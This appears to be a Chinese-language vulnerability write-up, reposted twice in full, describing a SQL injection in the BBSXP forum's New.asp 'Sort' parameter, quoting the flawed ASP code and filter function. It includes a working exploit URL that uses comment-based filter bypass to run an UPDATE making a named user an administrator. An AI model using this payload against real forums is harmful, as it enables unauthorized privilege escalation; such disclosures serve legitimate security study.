BBSXP论坛程序New.asp页面过滤不严导致SQL注入漏洞
受影响系统:
BBSXP7.3
BBSXP2008漏洞文件:
New.asp代码分析:Sort=HTMLEncode(Request("Sort")) //第24行if Sort = empty then
SqlSort="ThreadID"
else
SqlSort=Sort
end if
。。。。。。
sql="Select top "&SqlTopicCount&" * from ["&TablePrefix&"Threads] where Visible=1 "&SqlForumID&" "&SqlTimeLimit&" order by "&SqlSort&" desc" //第66行过滤函数HTMLEncode 在文件BBSXP_Class.asp中:
Function HTMLEncode(fString)
fString=Replace(fString,CHR(9),"")
fString=Replace(fString,CHR(13),"")
fString=Replace(fString,CHR(22),"")
fString=Replace(fString,CHR(38),"&") '“&”
fString=Replace(fString,CHR(32)," ") '“ ”
fString=Replace(fString,CHR(34),""") '“"”
fString=Replace(fString,CHR(39),"'") '“'”
fString=Replace(fString,CHR(42)&CHR(42),"**") '“**”/**/
fString=Replace(fString,CHR(44),",") '“,”
fString=Replace(fString,CHR(45)&CHR(45),"--") '“--”
fString=Replace(fString,CHR(60),"<") '“<”
fString=Replace(fString,CHR(62),">") '“>”
fString=Replace(fString,CHR(92),"\") '“\”
fString=Replace(fString,CHR(59),";") '“;”
fString=Replace(fString,CHR(10),"<br>")
fString=ReplaceText(fString,"([&#])([a-z0-9]*);","$1$2;")if SiteConfig("BannedText")<>"" then fString=ReplaceText(fString,"("&SiteConfig("BannedText")&")",string(len("&$1&"),"*"))if IsSqlDataBase=0 then '过滤片假名(日文字符)[\u30A0-\u30FF] by yuzi
fString=escape(fString)
fString=ReplaceText(fString,"%u30([A-F][0-F])","0$1;")
fString=unescape(fString)
end ifHTMLEncode=fString
End Function
HTMLEncode过滤了Tab键,空格,** .
变量SqlSort过滤不严导致sql注入漏洞的产生。漏洞测试:
http://localhost/bbsxp/new.asp?Sort=ThreadID/*o*/update/*o*/bbsxp_users/*o*/set/*o*/UserRoleID=1/*o*/where/*o*/Username=0x6C006F00760065006D006D006D00/*o*/select/*o*/*/*o*/from/*o*/BBSXP_users/*o*/order/*o*/by/*o*/userid
成功修改用户名为lovemmm为管理员。(最好使用POST提交呵呵)
BBSXP7.3
BBSXP2008漏洞文件:
New.asp代码分析:Sort=HTMLEncode(Request("Sort")) //第24行if Sort = empty then
SqlSort="ThreadID"
else
SqlSort=Sort
end if
。。。。。。
sql="Select top "&SqlTopicCount&" * from ["&TablePrefix&"Threads] where Visible=1 "&SqlForumID&" "&SqlTimeLimit&" order by "&SqlSort&" desc" //第66行过滤函数HTMLEncode 在文件BBSXP_Class.asp中:
Function HTMLEncode(fString)
fString=Replace(fString,CHR(9),"")
fString=Replace(fString,CHR(13),"")
fString=Replace(fString,CHR(22),"")
fString=Replace(fString,CHR(38),"&") '“&”
fString=Replace(fString,CHR(32)," ") '“ ”
fString=Replace(fString,CHR(34),""") '“"”
fString=Replace(fString,CHR(39),"'") '“'”
fString=Replace(fString,CHR(42)&CHR(42),"**") '“**”/**/
fString=Replace(fString,CHR(44),",") '“,”
fString=Replace(fString,CHR(45)&CHR(45),"--") '“--”
fString=Replace(fString,CHR(60),"<") '“<”
fString=Replace(fString,CHR(62),">") '“>”
fString=Replace(fString,CHR(92),"\") '“\”
fString=Replace(fString,CHR(59),";") '“;”
fString=Replace(fString,CHR(10),"<br>")
fString=ReplaceText(fString,"([&#])([a-z0-9]*);","$1$2;")if SiteConfig("BannedText")<>"" then fString=ReplaceText(fString,"("&SiteConfig("BannedText")&")",string(len("&$1&"),"*"))if IsSqlDataBase=0 then '过滤片假名(日文字符)[\u30A0-\u30FF] by yuzi
fString=escape(fString)
fString=ReplaceText(fString,"%u30([A-F][0-F])","0$1;")
fString=unescape(fString)
end ifHTMLEncode=fString
End Function
HTMLEncode过滤了Tab键,空格,** .
变量SqlSort过滤不严导致sql注入漏洞的产生。漏洞测试:
http://localhost/bbsxp/new.asp?Sort=ThreadID/*o*/update/*o*/bbsxp_users/*o*/set/*o*/UserRoleID=1/*o*/where/*o*/Username=0x6C006F00760065006D006D006D00/*o*/select/*o*/*/*o*/from/*o*/BBSXP_users/*o*/order/*o*/by/*o*/userid
成功修改用户名为lovemmm为管理员。(最好使用POST提交呵呵)
相关推荐
ALiDan 2020-06-11
godfather 2020-06-03
liuyang000 2020-04-20
ItBJLan 2020-04-19
qshpeng 2020-03-26
ALiDan 2020-07-27
qshpeng 2020-07-26
世樹 2020-07-17
chenjiazhu 2020-07-08
一对儿程序猿 2020-07-04
明月清风精进不止 2020-06-13
godfather 2020-06-13
ItBJLan 2020-06-11
tanrong 2020-06-11
码墨 2020-06-09
世樹 2020-06-05
lt云飞扬gt 2020-06-03